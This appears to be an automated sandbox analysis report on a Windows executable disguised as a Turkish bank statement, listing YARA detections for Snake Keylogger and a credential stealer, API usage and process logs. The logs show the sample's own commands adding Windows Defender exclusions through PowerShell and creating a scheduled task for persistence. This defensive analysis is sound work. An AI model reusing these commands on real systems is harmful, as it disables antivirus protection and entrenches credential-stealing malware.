Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000009.00000002.4791309433.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Hesap_Hareketleri_09122024_html.exe PID: 6852, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Hesap_Hareketleri_09122024_html.exe PID: 6256, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, c6qRU92LmfTIB8Prt7.cs	Security API names: _0020.SetAccessControl
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, c6qRU92LmfTIB8Prt7.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, c6qRU92LmfTIB8Prt7.cs	Security API names: _0020.AddAccessRule
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, u5ODOojcVMB5v7DYoZ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, u5ODOojcVMB5v7DYoZ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, c6qRU92LmfTIB8Prt7.cs	Security API names: _0020.SetAccessControl
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, c6qRU92LmfTIB8Prt7.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, c6qRU92LmfTIB8Prt7.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/15@3/3

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

File created: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2820:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7144:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3248:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5532:120:WilError_03
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Mutant created: \Sessions\1\BaseNamedObjects\ltNFVxNLlkOjxkLgqtBOZQykfrl

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

File created: C:\Users\user\AppData\Local\Temp\tmp211D.tmp

Jump to behavior

Source: Hesap_Hareketleri_09122024_html.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Hesap_Hareketleri_09122024_html.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000003004000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002FB5000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002EB2000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Hesap_Hareketleri_09122024_html.exe

ReversingLabs: Detection: 68%

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

File read: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe "C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe"
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EfgRyiVrT.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EfgRyiVrT" /XML "C:\Users\user\AppData\Local\Temp\tmp211D.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process created: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe "C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe C:\Users\user\AppData\Roaming\EfgRyiVrT.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EfgRyiVrT" /XML "C:\Users\user\AppData\Local\Temp\tmp335D.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process created: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe "C:\Users\user\AppData\Roaming\EfgRyiVrT.exe"
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EfgRyiVrT.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EfgRyiVrT" /XML "C:\Users\user\AppData\Local\Temp\tmp211D.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process created: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe "C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EfgRyiVrT" /XML "C:\Users\user\AppData\Local\Temp\tmp335D.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Process created: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe "C:\Users\user\AppData\Roaming\EfgRyiVrT.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
